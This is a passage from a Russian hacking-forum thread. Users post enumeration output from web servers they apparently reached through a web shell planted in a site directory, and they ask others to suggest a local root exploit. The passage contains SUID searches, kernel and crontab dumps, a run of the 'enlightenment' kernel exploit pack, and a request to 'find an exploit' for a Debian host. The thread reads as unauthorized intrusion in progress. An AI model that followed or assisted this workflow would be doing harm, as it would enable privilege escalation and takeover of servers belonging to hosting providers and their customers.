-rwxr-xr-x 1 root root 3791040 May 20 2011 vmlinuz-2.6.32-71.el6.x86_64

sh-4.1$ ls -la --full-time /lib
ls -la --full-time /lib
total 48
dr-xr-xr-x 10 root root 4096 2016-08-02 16:19:19.410880280 +0300 .
drwxr-xr-x 26 root root 4096 2016-07-05 00:30:41.385863698 +0300 ..
drwxr-xr-x 3 root root 4096 2016-05-11 11:24:26.000000000 +0300 alsa
lrwxrwxrwx 1 root root 14 2016-08-02 16:19:19.410880280 +0300 cpp -> ../usr/bin/cpp
drwxr-xr-x 3 root root 4096 2016-06-20 14:40:03.502496274 +0300 crda
drwxr-xr-x 46 root root 12288 2016-06-20 15:41:30.129591585 +0300 firmware
drwxr-xr-x 6 root root 4096 2011-12-08 18:08:22.000000000 +0400 kbd
dr-xr-xr-x 5 root root 4096 2016-06-20 14:40:09.462474436 +0300 modules
drwxr-xr-x 2 root root 4096 2016-05-11 02:18:18.000000000 +0300 security
drwxr-xr-x 6 root root 4096 2015-03-16 11:53:51.000000000 +0300 terminfo
drwxr-xr-x 5 root root 4096 2016-08-18 04:07:48.429461162 +0300 udev

sh-4.1$ mount
mount
/dev/sda1 on / type ext4 (rw,noatime)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
tmpfs on /dev/shm type tmpfs (rw)
/dev/sda3 on /tmp type ext4 (rw,noexec,nosuid,nodev,noatime,data=writeback,bar rier=0)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
/dev/sda4 on /home type ext4 (rw,noatime,usrquota,barrier=0)

sh-4.1$ df -h
df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda1 30G 6.8G 22G 25% /
tmpfs 24G 80K 24G 1% /dev/shm
/dev/sda3 2.0G 779M 1.1G 43% /tmp
/dev/sda4 1.8T 434G 1.4T 25% /home

sh-4.1$ cat /etc/issue
cat /etc/issue
CentOS release 6.8 (Final)
Kernel \r on an \m

sh-4.1$ cat /etc/crontab
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=cronlog
HOME=/

# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly

*/5 * * * * root /usr/local/bin/passwd_change.sh >/dev/null 2>&1
0 */3 * * * root /usr/local/bin/bbutemp.sh >/dev/null 2>&1
*/10 * * * * root /usr/local/bin/move_nrpe.sh >/dev/null 2>&1
*/10 * * * * root /usr/bin/timeout 540 puppet agent --no-daemonize --onetime -l /var/log/puppet/agent.log --onetime --certname `hostname` --server puppet.ihc-ru.net >/dev/null 2>&1; rm -f /var/lib/puppet/state/agent_catalog_run.lock
*/30 * * * * root ( fail2ban-client reload WordPress; /sbin/iptables -F http ) >/dev/null 2>&1
0 2 * * * root ( sqlite3 /var/lib/fail2ban/fail2ban.sqlite3 "DELETE FROM bans; VACUUM;"; /sbin/service fail2ban restart ) >/dev/null 2>&1
*/30 * * * * root /usr/local/bin/shape_shared.sh >/dev/null 2>&1
0 2 * * 7 root [ `date "+\%d"` -lt 8 ] && root /usr/local/bin/autolearn.sh >/dev/null 2>&1
30 22 * * * root /usr/local/bin/countfiles.sh >/dev/null 2>&1
*/3 * * * * root /usr/bin/killall -19 transmission-daemon deluge deluged mlnet rtorrent utserver deluge-web fmb qbittorrent minerd jhprimeminer bitcoind > /dev/null 2>&1
40 17 * * * root /usr/local/bin/regkernelcare >/dev/null 2>&1
0 3 * * 1 root /usr/local/bin/virusscan.pl >/dev/null 2>&1

sh-4.1$ ls -la /etc/cron.d
ls -la /etc/cron.d
total 44
drwxr-xr-x 2 root root 4096 Jun 20 16:19 .
drwxr-xr-x 103 root root 12288 Sep 18 21:45 ..
-rw-r--r-- 1 root root 67 Apr 28 2010 atop
-rw-r--r-- 1 root root 50 Jun 20 16:15 kcare-cron
-rw-r--r-- 1 root root 405 Jun 20 16:17 lsws
-rw-r--r-- 1 root root 232 Jun 20 16:19 puppet
-rw------- 1 root root 108 Dec 11 2015 raid-check
-rw-r--r-- 1 root root 459 Dec 5 2013 sa-update
-rw------- 1 root root 235 May 11 05:02 sysstat

sh-4.1$ ls -la /etc/cron.hourly
ls -la /etc/cron.hourly
total 28
drwxr-xr-x 2 root root 4096 Jun 20 16:19 .
drwxr-xr-x 103 root root 12288 Sep 18 21:45 ..
-rwxr-xr-x 1 root root 195 Mar 20 2013 00awstats
-rwx------ 1 root root 611 Jun 20 16:17 ip6_check_count_rules.sh
-rwx------ 1 root root 899 Jun 20 16:16 rotate_acct.sh

sh-4.1$ ls -la /etc/cron.monthly
ls -la /etc/cron.monthly
total 20
drwxr-xr-x 2 root root 4096 Jun 20 15:41 .
drwxr-xr-x 103 root root 12288 Sep 18 21:49 ..
-rwxr-xr-x 1 root root 111 Nov 23 2013 readahead-monthly.cron

sh-4.1$ ls -la /etc/cron.weekly
ls -la /etc/cron.weekly
total 16
drwxr-xr-x 2 root root 4096 Apr 17 2012 .
drwxr-xr-x 103 root root 12288 Sep 18 21:50 ..

sh-4.1$ cat /proc/version
cat /proc/version
Linux version 2.6.32-642.1.1.el6.x86_64 (mockbuild@worker1.bsys.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-17) (GCC) ) #1 SMP Tue May 31 21:57:07 UTC 2016

sh-4.1$ cat /proc/sys/vm/mmap_min_addr
cat /proc/sys/vm/mmap_min_addr
4096

sh-4.1$ pwd
pwd
/home/p2267/www/****.ru/content

sh-4.1$ ls -la /usr/bin/staprun
ls -la /usr/bin/staprun
---s--x--- 1 root stapusr 183072 May 11 02:40 /usr/bin/staprun

sh-4.1$ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
-rwsr-x--- 1 root dbus 50552 Apr 22 2015 /lib64/dbus-1/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 53472 May 11 01:58 /bin/umount
-rwsr-xr-x 1 root root 77336 May 11 01:58 /bin/mount
-rwsr-xr-x 1 root root 34904 May 11 11:59 /bin/su
-rwsr-xr-x 1 root root 36488 May 10 21:32 /bin/ping6
-rwsr-xr-x 1 root root 38264 May 10 21:32 /bin/ping
-r-sr-xr-x 1 root root 19848 Jun 30 2015 /usr/local/lsws/bin/lscgid.5.0.1
-r-sr-xr-x 1 root root 19848 May 26 16:56 /usr/local/lsws/bin/lscgid.5.0.17
-r-sr-xr-x 1 root root 23736 Aug 4 2014 /usr/local/lsws/bin/lscgid.4.2.13
-r-sr-xr-x 1 root root 19848 Nov 19 2015 /usr/local/lsws/bin/lscgid.5.0.8
-r-sr-xr-x 1 root root 19848 Jul 22 2015 /usr/local/lsws/bin/lscgid.5.0.2
-r-sr-xr-x 1 root root 21984 Jan 12 2012 /usr/local/lsws/bin/lscgid.4.1.10
-r-sr-xr-x 1 root root 23736 Jun 10 2014 /usr/local/lsws/bin/lscgid.4.2.12
-r-sr-xr-x 1 root root 19848 Apr 18 09:35 /usr/local/lsws/bin/lscgid.5.1.4
-r-sr-xr-x 1 root root 19848 Apr 18 10:51 /usr/local/lsws/bin/lscgid.5.0.15
-r-sr-xr-x 1 root root 19848 Jul 20 09:55 /usr/local/lsws/bin/lscgid.5.1.7
-r-sr-xr-x 1 root root 23736 Jan 14 2015 /usr/local/lsws/bin/lscgid.4.2.20
-r-sr-xr-x 1 root root 19848 Aug 31 2015 /usr/local/lsws/bin/lscgid.5.0.5
-r-sr-xr-x 1 root root 23736 Feb 4 2015 /usr/local/lsws/bin/lscgid.4.2.21
-r-sr-xr-x 1 root root 19848 Mar 14 2016 /usr/local/lsws/bin/lscgid.5.0.14
-r-sr-xr-x 1 root root 23736 Nov 18 2013 /usr/local/lsws/bin/lscgid.4.2.5
-r-sr-xr-x 1 root root 23736 Oct 9 2014 /usr/local/lsws/bin/lscgid.4.2.17
-r-sr-xr-x 1 root root 23736 Oct 2 2014 /usr/local/lsws/bin/lscgid.4.2.16
-r-sr-xr-x 1 root root 23736 Nov 25 2014 /usr/local/lsws/bin/lscgid.4.2.19
-r-sr-xr-x 1 root root 19848 Oct 13 2015 /usr/local/lsws/bin/lscgid.5.0.7
-r-sr-xr-x 1 root root 23736 Oct 31 2014 /usr/local/lsws/bin/lscgid.4.2.18
-r-sr-xr-x 1 root root 23736 Aug 14 2014 /usr/local/lsws/bin/lscgid.4.2.14
-r-sr-xr-x 1 root root 23736 Apr 8 2014 /usr/local/lsws/bin/lscgid.4.2.6
-r-sr-xr-x 1 root root 23736 Apr 9 2014 /usr/local/lsws/bin/lscgid.4.2.9
-r-sr-xr-x 1 root root 23736 May 22 2014 /usr/local/lsws/bin/lscgid.4.2.11
-r-sr-xr-x 1 root root 19848 Aug 17 2015 /usr/local/lsws/bin/lscgid.5.0.4
-r-sr-xr-x 1 root root 19848 Jul 13 09:42 /usr/local/lsws/bin/lscgid.5.1.6
-r-sr-xr-x 1 root root 23736 Apr 1 2014 /usr/local/lsws/bin/lscgid.4.2.7
-r-sr-xr-x 1 root root 23736 Jun 1 2015 /usr/local/lsws/bin/lscgid.4.2.23
-r-sr-xr-x 1 root root 19848 Dec 6 2015 /usr/local/lsws/bin/lscgid.5.0.9
-r-sr-xr-x 1 root root 23736 Apr 9 2014 /usr/local/lsws/bin/lscgid.4.2.8
-r-sr-xr-x 1 root root 19848 May 25 12:28 /usr/local/lsws/bin/lscgid.5.1.5
-r-sr-xr-x 1 root root 23736 Sep 29 2013 /usr/local/lsws/bin/lscgid.4.2.4
-r-sr-xr-x 1 root root 19848 Jun 24 2015 /usr/local/lsws/bin/lscgid.5.0
-rws--x--x 1 root root 14280 May 10 17:11 /usr/libexec/pt_chown
-rws--x--x 1 vcsa root 11208 May 11 00:24 /usr/libexec/mc/cons.saver
-rwsr-xr-x 1 root root 257824 May 12 07:52 /usr/libexec/openssh/ssh-keysign
-rwsr-xr-x 1 root root 14368 Mar 17 2015 /usr/libexec/polkit-1/polkit-agent-helper-1
-rws--x--x 1 root root 20184 May 11 01:58 /usr/bin/chfn
-rws--x--x 1 root root 20056 May 11 01:58 /usr/bin/chsh
-rwsr-xr-x 1 root root 40240 May 11 00:23 /usr/bin/newgrp
-rwsr-xr-x 1 root root 30768 Nov 23 2015 /usr/bin/passwd
-rwsr-xr-x 1 root root 75640 May 11 00:23 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 70480 May 11 00:23 /usr/bin/chage
-rwsr-xr-x 1 root root 22544 Mar 17 2015 /usr/bin/pkexec
-rwsr-xr-x 1 root root 54496 Feb 19 2015 /usr/bin/at
---s--x--x 1 root root 123832 May 11 02:13 /usr/bin/sudo
---s--x--- 1 root stapusr 183072 May 11 02:40 /usr/bin/staprun
-rwsr-xr-x 1 root root 21302 May 5 2014 /usr/share/doc/fping-3.10/ChangeLog
-rwsr-xr-x 1 root root 1067 May 5 2014 /usr/share/doc/fping-3.10/COPYING
-rwsr-xr-x 1 root root 1496 May 5 2014 /usr/share/doc/fping-3.10/README
-rwsr-xr-x 1 root root 92815 May 7 2014 /usr/sbin/fping6
-rwsr-xr-x 1 root root 9000 May 11 22:34 /usr/sbin/usernetctl
-rwsr-xr-x 1 root root 1274440 Mar 4 2016 /usr/sbin/exim
-rws--x--x 1 root root 42288 Aug 22 2010 /usr/sbin/userhelper
-rwsr-xr-x 1 root root 42792 May 7 2014 /usr/sbin/fping
-rwsr-xr-x 1 root root 34840 May 11 02:18 /sbin/unix_chkpwd
-rwsr-xr-x 1 root root 10272 May 11 02:18 /sbin/pam_timestamp_check
-rwsrwsrwt 1 p2267 p2267 72844 Sep 18 19:16 /home/p2267/www/****.ru/content/pagesinfo.php

[B]Пробовал enlightenment, результат следующий:

[CODE]
Code:
sh-4.1$ tar -zxf enlightenment.tgz && cd enlightenment && ./run_null_exploits.sh

zifus

09.11.2016, 20:57

Здравствуйте!! Помогите найти сплоит...

.SpoilerTarget" type="button">Spoiler: uname -a

Code:
Linux ***** 2.6.32-37-pve #1 SMP Wed Feb 11 10:00:27 CET 2015 i686 GNU/Linux

.SpoilerTarget" type="button">Spoiler: ls -la /boot

Code:
$ ls -la /boot 2>&1
total 8
drwxr-xr-x 2 root root 4096 Nov 11 2010 .
drwxr-xr-x 24 root root 4096 Nov 9 01:09 ..

.SpoilerTarget" type="button">Spoiler: ls -la --full-time /lib

Code:
$ ls -la --full-time /lib 2>&1
total 5164
drwxr-xr-x 10 root root 4096 2013-04-29 14:57:53.000000000 +0400 .
drwxr-xr-x 24 root root 4096 2016-11-09 01:09:27.096608013 +0400 ..
lrwxrwxrwx 1 root root 21 2013-04-29 14:57:53.000000000 +0400 cpp -> /etc/alternatives/cpp
drwxr-xr-x 2 root root 4096 2010-11-11 17:57:23.000000000 +0300 i486-linux-gnu
drwxr-xr-x 3 root root 4096 2010-11-11 17:57:21.000000000 +0300 init
-rwxr-xr-x 1 root root 113248 2011-01-08 09:59:32.000000000 +0300 ld-2.7.so
lrwxrwxrwx 1 root root 9 2013-04-29 14:39:24.000000000 +0400 ld-linux.so.2 -> ld-2.7.so
-rw-r--r-- 1 root root 5436 2011-01-08 09:59:33.000000000 +0300 libBrokenLocale-2.7.so
lrwxrwxrwx 1 root root 22 2013-04-29 14:39:24.000000000 +0400 libBrokenLocale.so.1 -> libBrokenLocale-2.7.so
-rw-r--r-- 1 root root 13692 2011-01-08 09:59:32.000000000 +0300 libSegFault.so
lrwxrwxrwx 1 root root 15 2013-04-29 14:38:23.000000000 +0400 libacl.so.1 -> libacl.so.1.1.0
-rw-r--r-- 1 root root 24800 2008-04-24 01:22:04.000000000 +0400 libacl.so.1.1.0
-rw-r--r-- 1 root root 9800 2011-01-08 09:59:32.000000000 +0300 libanl-2.7.so
lrwxrwxrwx 1 root root 13 2013-04-29 14:39:24.000000000 +0400 libanl.so.1 -> libanl-2.7.so
lrwxrwxrwx 1 root root 16 2013-04-29 14:38:23.000000000 +0400 libattr.so.1 -> libattr.so.1.1.0
-rw-r--r-- 1 root root 14744 2009-02-10 13:52:07.000000000 +0300 libattr.so.1.1.0
lrwxrwxrwx 1 root root 15 2013-04-29 14:38:23.000000000 +0400 libblkid.so.1 -> libblkid.so.1.0
-rw-r--r-- 1 root root 38020 2008-10-13 07:33:35.000000000 +0400 libblkid.so.1.0
lrwxrwxrwx 1 root root 15 2013-04-29 14:38:23.000000000 +0400 libbz2.so.1 -> libbz2.so.1.0.4
lrwxrwxrwx 1 root root 15 2013-04-29 14:38:23.000000000 +0400 libbz2.so.1.0 -> libbz2.so.1.0.4
-rw-r--r-- 1 root root 66276 2010-08-18 21:15:26.000000000 +0400 libbz2.so.1.0.4
-rwxr-xr-x 1 root root 1294572 2011-01-08 09:59:32.000000000 +0300 libc-2.7.so
lrwxrwxrwx 1 root root 11 2013-04-29 14:39:24.000000000 +0400 libc.so.6 -> libc-2.7.so
lrwxrwxrwx 1 root root 14 2013-04-29 14:38:23.000000000 +0400 libcap.so.1 -> libcap.so.1.10
-rw-r--r-- 1 root root 11024 2004-04-14 02:10:45.000000000 +0400 libcap.so.1.10
lrwxrwxrwx 1 root root 14 2013-04-29 14:38:23.000000000 +0400 libcap.so.2 -> libcap.so.2.11
-rw-r--r-- 1 root root 13364 2008-07-26 19:26:50.000000000 +0400 libcap.so.2.11
lrwxrwxrwx 1 root root 17 2013-04-29 14:38:23.000000000 +0400 libcfont.so.0 -> libcfont.so.0.0.0
-rw-r--r-- 1 root root 10712 2008-04-16 01:18:10.000000000 +0400 libcfont.so.0.0.0
-rw-r--r-- 1 root root 185816 2011-01-08 09:59:32.000000000 +0300 libcidn-2.7.so
lrwxrwxrwx 1 root root 14 2013-04-29 14:39:24.000000000 +0400 libcidn.so.1 -> libcidn-2.7.so
lrwxrwxrwx 1 root root 17 2013-04-29 14:38:23.000000000 +0400 libcom_err.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root 8676 2008-10-13 07:33:34.000000000 +0400 libcom_err.so.2.1
lrwxrwxrwx 1 root root 19 2013-04-29 14:38:23.000000000 +0400 libconsole.so.0 -> libconsole.so.0.0.0
-rw-r--r-- 1 root root 72816 2008-04-16 01:18:10.000000000 +0400 libconsole.so.0.0.0
-rw-r--r-- 1 root root 38296 2011-01-08 09:59:32.000000000 +0300 libcrypt-2.7.so
lrwxrwxrwx 1 root root 15 2013-04-29 14:39:24.000000000 +0400 libcrypt.so.1 -> libcrypt-2.7.so
lrwxrwxrwx 1 root root 19 2013-04-29 14:38:23.000000000 +0400 libctutils.so.0 -> libctutils.so.0.0.0
-rw-r--r-- 1 root root 17024 2008-04-16 01:18:10.000000000 +0400 libctutils.so.0.0.0
lrwxrwxrwx 1 root root 15 2013-04-29 14:38:23.000000000 +0400 libdb.so.2 -> libdb1-2.2.5.so
-rw-r--r-- 1 root root 55052 2006-02-15 01:06:32.000000000 +0300 libdb1-2.2.5.so
lrwxrwxrwx 1 root root 15 2013-04-29 14:38:23.000000000 +0400 libdb1.so.2 -> libdb1-2.2.5.so
-rw-r--r-- 1 root root 9680 2011-01-08 09:59:32.000000000 +0300 libdl-2.7.so
lrwxrwxrwx 1 root root 12 2013-04-29 14:39:24.000000000 +0400 libdl.so.2 -> libdl-2.7.so
lrwxrwxrwx 1 root root 13 2013-04-29 14:38:23.000000000 +0400 libe2p.so.2 -> libe2p.so.2.3
-rw-r--r-- 1 root root 22912 2008-10-13 07:33:35.000000000 +0400 libe2p.so.2.3
lrwxrwxrwx 1 root root 16 2013-04-29 14:38:23.000000000 +0400 libext2fs.so.2 -> libext2fs.so.2.4
-rw-r--r-- 1 root root 167900 2008-10-13 07:33:35.000000000 +0400 libext2fs.so.2.4
-rw-r--r-- 1 root root 49676 2008-12-31 15:50:19.000000000 +0300 libgcc_s.so.1
lrwxrwxrwx 1 root root 17 2013-04-29 14:38:23.000000000 +0400 libhistory.so.5 -> libhistory.so.5.2
-rw-r--r-- 1 root root 28032 2009-01-20 18:07:11.000000000 +0300 libhistory.so.5.2
-rw-r--r-- 1 root root 5744 2008-09-01 15:01:21.000000000 +0400 libkeyutils-1.2.so
lrwxrwxrwx 1 root root 18 2013-04-29 14:38:23.000000000 +0400 libkeyutils.so.1 -> libkeyutils-1.2.so
-rw-r--r-- 1 root root 149328 2011-01-08 09:59:32.000000000 +0300 libm-2.7.so
lrwxrwxrwx 1 root root 11 2013-04-29 14:39:24.000000000 +0400 libm.so.6 -> libm-2.7.so
-rw-r--r-- 1 root root 13692 2011-01-08 09:59:32.000000000 +0300 libmemusage.so
lrwxrwxrwx 1 root root 17 2013-04-29 14:38:23.000000000 +0400 libncurses.so.5 -> libncurses.so.5.7
-rw-r--r-- 1 root root 202188 2008-12-14 23:27:28.000000000 +0300 libncurses.so.5.7
lrwxrwxrwx 1 root root 18 2013-04-29 14:38:23.000000000 +0400 libncursesw.so.5 -> libncursesw.so.5.7
-rw-r--r-- 1 root root 249836 2008-12-14 23:27:29.000000000 +0300 libncursesw.so.5.7
-rw-r--r-- 1 root root 79608 2011-01-08 09:59:32.000000000 +0300 libnsl-2.7.so
lrwxrwxrwx 1 root root 13 2013-04-29 14:39:24.000000000 +0400 libnsl.so.1 -> libnsl-2.7.so
-rw-r--r-- 1 root root 30436 2011-01-08 09:59:32.000000000 +0300 libnss_compat-2.7.so
lrwxrwxrwx 1 root root 20 2013-04-29 14:39:24.000000000 +0400 libnss_compat.so.2 -> libnss_compat-2.7.so
-rw-r--r-- 1 root root 17880 2011-01-08 09:59:33.000000000 +0300 libnss_dns-2.7.so
lrwxrwxrwx 1 root root 17 2013-04-29 14:39:24.000000000 +0400 libnss_dns.so.2 -> libnss_dns-2.7.so
-rw-r--r-- 1 root root 38408 2011-01-08 09:59:32.000000000 +0300 libnss_files-2.7.so
lrwxrwxrwx 1 root root 19 2013-04-29 14:39:24.000000000 +0400 libnss_files.so.2 -> libnss_files-2.7.so
-rw-r--r-- 1 root root 17896 2011-01-08 09:59:32.000000000 +0300 libnss_hesiod-2.7.so
lrwxrwxrwx 1 root root 20 2013-04-29 14:39:24.000000000 +0400 libnss_hesiod.so.2 -> libnss_hesiod-2.7.so
-rw-r--r-- 1 root root 76292 2008-11-04 18:09:17.000000000 +0300 libnss_ldap-2.7.so
lrwxrwxrwx 1 root root 18 2013-04-29 14:38:23.000000000 +0400 libnss_ldap.so.2 -> libnss_ldap-2.7.so
-rw-r--r-- 1 root root 34348 2011-01-08 09:59:33.000000000 +0300 libnss_nis-2.7.so
lrwxrwxrwx 1 root root 17 2013-04-29 14:39:24.000000000 +0400 libnss_nis.so.2 -> libnss_nis-2.7.so
-rw-r--r-- 1 root root 46600 2011-01-08 09:59:32.000000000 +0300 libnss_nisplus-2.7.so
lrwxrwxrwx 1 root root 21 2013-04-29 14:39:24.000000000 +0400 libnss_nisplus.so.2 -> libnss_nisplus-2.7.so
lrwxrwxrwx 1 root root 17 2013-04-29 14:38:23.000000000 +0400 libpam.so.0 -> libpam.so.0.81.12
-rw-r--r-- 1 root root 40440 2009-03-18 03:03:06.000000000 +0300 libpam.so.0.81.12
lrwxrwxrwx 1 root root 21 2013-04-29 14:38:23.000000000 +0400 libpam_misc.so.0 -> libpam_misc.so.0.81.3
-rw-r--r-- 1 root root 8256 2009-03-18 03:03:06.000000000 +0300 libpam_misc.so.0.81.3
lrwxrwxrwx 1 root root 17 2013-04-29 14:38:23.000000000 +0400 libpamc.so.0 -> libpamc.so.0.81.0
-rw-r--r-- 1 root root 9144 2009-03-18 03:03:06.000000000 +0300 libpamc.so.0.81.0
-rw-r--r-- 1 root root 5440 2011-01-08 09:59:32.000000000 +0300 libpcprofile.so
lrwxrwxrwx 1 root root 16 2013-04-29 14:38:23.000000000 +0400 libpopt.so.0 -> libpopt.so.0.0.0
-rw-r--r-- 1 root root 33284 2008-06-25 10:27:20.000000000 +0400 libpopt.so.0.0.0
-rw-r--r-- 1 root root 56180 2009-01-12 00:49:28.000000000 +0300 libproc-3.2.7.so
-rwxr-xr-x 1 root root 112012 2011-01-08 09:59:36.000000000 +0300 libpthread-2.7.so
lrwxrwxrwx 1 root root 17 2013-04-29 14:39:24.000000000 +0400 libpthread.so.0 -> libpthread-2.7.so
lrwxrwxrwx 1 root root 18 2013-04-29 14:38:23.000000000 +0400 libreadline.so.5 -> libreadline.so.5.2
-rw-r--r-- 1 root root 200548 2009-01-20 18:07:11.000000000 +0300 libreadline.so.5.2
-rw-r--r-- 1 root root 63312 2011-01-08 09:59:32.000000000 +0300 libresolv-2.7.so
lrwxrwxrwx 1 root root 16 2013-04-29 14:39:24.000000000 +0400 libresolv.so.2 -> libresolv-2.7.so
-rw-r--r-- 1 root root 30624 2011-01-08 09:59:32.000000000 +0300 librt-2.7.so
lrwxrwxrwx 1 root root 12 2013-04-29 14:39:24.000000000 +0400 librt.so.1 -> librt-2.7.so
-rw-r--r-- 1 root root 95964 2008-09-16 11:38:17.000000000 +0400 libselinux.so.1
-rw-r--r-- 1 root root 215260 2008-07-12 18:51:50.000000000 +0400 libsepol.so.1
lrwxrwxrwx 1 root root 17 2013-04-29 14:38:23.000000000 +0400 libslang.so.2 -> libslang.so.2.1.3
-rw-r--r-- 1 root root 683040 2008-03-17 21:50:56.000000000 +0300 libslang.so.2.1.3
lrwxrwxrwx 1 root root 12 2013-04-29 14:38:23.000000000 +0400 libss.so.2 -> libss.so.2.0
-rw-r--r-- 1 root root 18636 2008-10-13 07:33:34.000000000 +0400 libss.so.2.0
lrwxrwxrwx 1 root root 17 2013-04-29 14:38:23.000000000 +0400 libsysfs.so.2 -> libsysfs.so.2.0.1
-rw-r--r-- 1 root root 38584 2008-09-06 12:40:51.000000000 +0400 libsysfs.so.2.0.1
-rw-r--r-- 1 root root 26284 2011-01-08 09:59:32.000000000 +0300 libthread_db-1.0.so
lrwxrwxrwx 1 root root 19 2013-04-29 14:39:24.000000000 +0400 libthread_db.so.1 -> libthread_db-1.0.so
lrwxrwxrwx 1 root root 13 2013-04-29 14:38:23.000000000 +0400 libtic.so.5 -> libtic.so.5.7
-rw-r--r-- 1 root root 71736 2008-12-14 23:27:28.000000000 +0300 libtic.so.5.7
lrwxrwxrwx 1 root root 14 2013-04-29 14:38:23.000000000 +0400 libticw.so.5 -> libticw.so.5.7
-rw-r--r-- 1 root root 71736 2008-12-14 23:27:29.000000000 +0300 libticw.so.5.7
lrwxrwxrwx 1 root root 19 2013-04-29 14:38:23.000000000 +0400 libusb-0.1.so.4 -> libusb-0.1.so.4.4.4
-rw-r--r-- 1 root root 29264 2008-09-05 15:21:18.000000000 +0400 libusb-0.1.so.4.4.4
-rw-r--r-- 1 root root 9684 2011-01-08 09:59:32.000000000 +0300 libutil-2.7.so
lrwxrwxrwx 1 root root 14 2013-04-29 14:39:24.000000000 +0400 libutil.so.1 -> libutil-2.7.so
lrwxrwxrwx 1 root root 14 2013-04-29 14:38:23.000000000 +0400 libuuid.so.1 -> libuuid.so.1.2
-rw-r--r-- 1 root root 12912 2008-10-13 07:33:34.000000000 +0400 libuuid.so.1.2
lrwxrwxrwx 1 root root 16 2013-04-29 14:38:23.000000000 +0400 libwrap.so.0 -> libwrap.so.0.7.6
-rw-r--r-- 1 root root 31168 2008-07-26 03:45:03.000000000 +0400 libwrap.so.0.7.6
lrwxrwxrwx 1 root root 19 2013-04-29 14:38:23.000000000 +0400 libxtables.so.0 -> libxtables.so.0.0.0
-rw-r--r-- 1 root root 18380 2009-02-09 22:52:34.000000000 +0300 libxtables.so.0.0.0
drwxr-xr-x 2 root root 4096 2010-11-11 17:57:28.000000000 +0300 lsb
drwxr-xr-x 5 root root 4096 2016-01-21 14:15:29.181003302 +0400 modules
drwxr-xr-x 2 root root 4096 2010-11-11 17:58:14.000000000 +0300 security
drwxr-xr-x 15 root root 4096 2010-11-11 17:57:27.000000000 +0300 terminfo
drwxr-xr-x 3 root root 4096 2013-04-29 14:38:26.000000000 +0400 udev
drwxr-xr-x 2 root root 4096 2010-11-11 17:57:51.000000000 +0300 xtables

.SpoilerTarget" type="button">Spoiler: mount

Code:
$ mount 2>&1
/dev/simfs on / type simfs (rw,relatime,usrquota,grpquota)
proc on /proc type proc (rw,relatime)
sysfs on /sys type sysfs (rw,relatime)
tmpfs on /lib/init/rw type tmpfs (rw,nosuid,relatime,mode=755)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev,relatime)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,mode=600,ptmxmode=000)
binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,nosuid,nodev,noexec,relatime)

.SpoilerTarget" type="button">Spoiler: df -h

Code:
$ df -h 2>&1
Filesystem Size Used Avail Use% Mounted on
/dev/simfs 50G 36G 15G 71% /
tmpfs 1.0G 0 1.0G 0% /lib/init/rw
tmpfs 1.0G 0 1.0G 0% /dev/shm

.SpoilerTarget" type="button">Spoiler: cat /etc/issue

Code:
$ cat /etc/issue 2>&1
Debian GNU/Linux 5.0 \n \l

.SpoilerTarget" type="button">Spoiler: cat /etc/crontab

Code:
$ cat /etc/crontab 2>&1
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
12 * * * * root cd / && run-parts --report /etc/cron.hourly
53 4 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
46 0 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
55 5 30 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

.SpoilerTarget" type="button">Spoiler: cat /proc/version

Code:
$ cat /proc/version 2>&1
Linux version 2.6.32-37-pve (root@lola) (gcc version 4.7.2 (Debian 4.7.2-5) ) #1 SMP Wed Feb 11 10:00:27 CET 2015

.SpoilerTarget" type="button">Spoiler: cat /proc/sys/vm/mmap_min_addr

Code:
$ cat /proc/sys/vm/mmap_min_addr 2>&1
4096

.SpoilerTarget" type="button">Spoiler: ls -la /usr/bin/staprun"

Code:
$ ls -la /usr/bin/staprun 2>&1
ls: cannot access /usr/bin/staprun: No such file or directory

YaBtr

10.11.2016, 09:08

zifus said:
↑ (https://antichat.live/posts/4011388/)
Здравствуйте!! Помогите найти сплоит...
Spoiler: uname -a

Code:
Linux ***** 2.6.32-37-pve #1 SMP Wed Feb 11 10:00:27 CET 2015 i686 GNU/Linux

Spoiler: ls -la /boot

Code:
$ ls -la /boot 2>&1
total 8
drwxr-xr-x 2 root root 4096 Nov 11 2010 .
drwxr-xr-x 24 root root 4096 Nov 9 01:09 ..

Spoiler: ls -la --full-time /lib

Code:
$ ls -la --full-time /lib 2>&1
total 5164
drwxr-xr-x 10 root root 4096 2013-04-29 14:57:53.000000000 +0400 .
drwxr-xr-x 24 root root 4096 2016-11-09 01:09:27.096608013 +0400 ..
lrwxrwxrwx 1 root root 21 2013-04-29 14:57:53.000000000 +0400 cpp -> /etc/alternatives/cpp
drwxr-xr-x 2 root root 4096 2010-11-11 17:57:23.000000000 +0300 i486-linux-gnu
drwxr-xr-x 3 root root 4096 2010-11-11 17:57:21.000000000 +0300 init
-rwxr-xr-x 1 root root 113248 2011-01-08 09:59:32.000000000 +0300 ld-2.7.so
lrwxrwxrwx 1 root root 9 2013-04-29 14:39:24.000000000 +0400 ld-linux.so.2 -> ld-2.7.so
-rw-r--r-- 1 root root 5436 2011-01-08 09:59:33.000000000 +0300 libBrokenLocale-2.7.so
